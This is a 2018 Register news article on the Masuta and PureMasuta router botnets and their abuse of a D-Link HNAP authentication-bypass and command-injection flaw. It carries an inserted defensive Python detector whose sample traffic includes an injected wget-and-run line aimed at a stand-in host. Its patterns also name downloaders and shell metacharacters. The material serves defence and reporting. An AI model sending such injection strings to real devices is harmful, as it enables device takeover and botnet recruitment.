Fresh botnet recruiting routers with weak credentials

With a special HNAP exploit just for D-Link kit

By Richard Chirgwin

Posted in Security, 24th January 2018 04:29 GMT

Security researchers believe the author of the Satori botnet is at it again, this time attacking routers to craft a botnet dubbed "Masuta".

The early-January Satori botnet exploited a Huawei router zero-day. Masuta also targets routers.

According to NewSky's analysis, the attack comes in two flavours. There's Masuta, which takes the standard IoT approach of trying default credentials against devices (the credential list is hidden by a single XOR with 0x22, a trick borrowed from Mirai); and there's the more sophisticated "PureMasuta", which exploits an old network administration bug.

That bug was spotted back in 2015, when Craig Heffner identified a flaw in D-Link's Home Network Administration Protocol (HNAP). That's what PureMasuta tries to exploit.

NewSky wrote:

It is possible to craft a SOAP query which can bypass authentication by using hxxp://purenetworks.com/HNAP1/GetDeviceSettings. Also, it is feasible to run system commands (leading to arbitrary code execution) because of improper string handling. When both issues are combined, one can form a SOAP request which first bypasses authentication, and then causes arbitrary code execution.

Because the bug lets an attacker run arbitrary commands after the GetDeviceSettings call, PureMasuta's bot-herders use it to run wget, fetching and executing a shell script that recruits the device into the botnet.
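As an added illustration from the defender's side (this is not NewSky's or The Register's code), here is a small Python detector that flags HNAP requests combining a GetDeviceSettings SOAP call with command-injection markers or a fetch-and-run sequence of the kind described above; the request structure, severity thresholds and sample traffic are constructed assumptions.

```python
import re
from dataclasses import dataclass, field

# Patterns approximating the PureMasuta HNAP abuse described in the article:
# a SOAP request to /HNAP1 that names GetDeviceSettings and carries command-
# injection markers or a download tool. Field names and thresholds are assumptions.
HNAP_PATH = re.compile(r"^/HNAP1(/|$)", re.IGNORECASE)
GET_DEVICE_SETTINGS = re.compile(r"GetDeviceSettings", re.IGNORECASE)
SHELL_META = re.compile(r"[`;|&]|\$\(")
DOWNLOADER = re.compile(r"\b(wget|curl|tftp)\b", re.IGNORECASE)

@dataclass
class HttpRequest:
    src_ip: str
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    body: str = ""

def classify(req: HttpRequest):
    """Return (severity, reasons) for one request; severity is None when benign."""
    if not HNAP_PATH.match(req.path):
        return None, []
    # Inspect headers and body together: the injection point varies by firmware.
    blob = "\n".join(f"{k}: {v}" for k, v in req.headers.items()) + "\n" + req.body
    reasons = []
    if SHELL_META.search(blob):
        reasons.append("shell metacharacters in HNAP request")
    if DOWNLOADER.search(blob):
        reasons.append("download tool named in HNAP request")
    if not reasons:
        return None, []  # a plain GetDeviceSettings call is normal discovery traffic
    if req.method.upper() == "POST" and GET_DEVICE_SETTINGS.search(blob):
        return "high", reasons + ["combined with GetDeviceSettings SOAP call"]
    return "medium", reasons

def scan(requests):
    """Return alerts as (src_ip, severity, reasons) for every flagged request."""
    return [(r.src_ip, s, why) for r in requests for s, why in [classify(r)] if s]

# Constructed sample traffic (not real captures): two benign, two suspicious.
SAMPLE = [
    HttpRequest("192.0.2.10", "GET", "/HNAP1/"),
    HttpRequest("192.0.2.11", "POST", "/HNAP1/",
                {"SOAPAction": '"http://purenetworks.com/HNAP1/GetDeviceSettings"'},
                "<soap:Envelope><GetDeviceSettings/></soap:Envelope>"),
    HttpRequest("198.51.100.7", "POST", "/HNAP1/",
                {"SOAPAction": '"http://purenetworks.com/HNAP1/GetDeviceSettings"'},
                "<GetDeviceSettings>; wget http://c2.invalid/x.sh; sh x.sh</GetDeviceSettings>"),
    HttpRequest("198.51.100.8", "POST", "/HNAP1/", {}, "<Login><Action>$(id)</Action></Login>"),
]
```

Running `scan(SAMPLE)` yields one "high" alert for 198.51.100.7 and one "medium" alert for 198.51.100.8; the two legitimate discovery requests are left alone.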

If you have a vulnerable device – D-Link's AC300, for example – make sure you've got firmware newer than 2015.

NewSky attributes the botnet to an entity it dubs "Nexus Zeta", based on the C&C URL nexusiotsolutions(dot)net, which is the same URL the Satori botnet used. ®
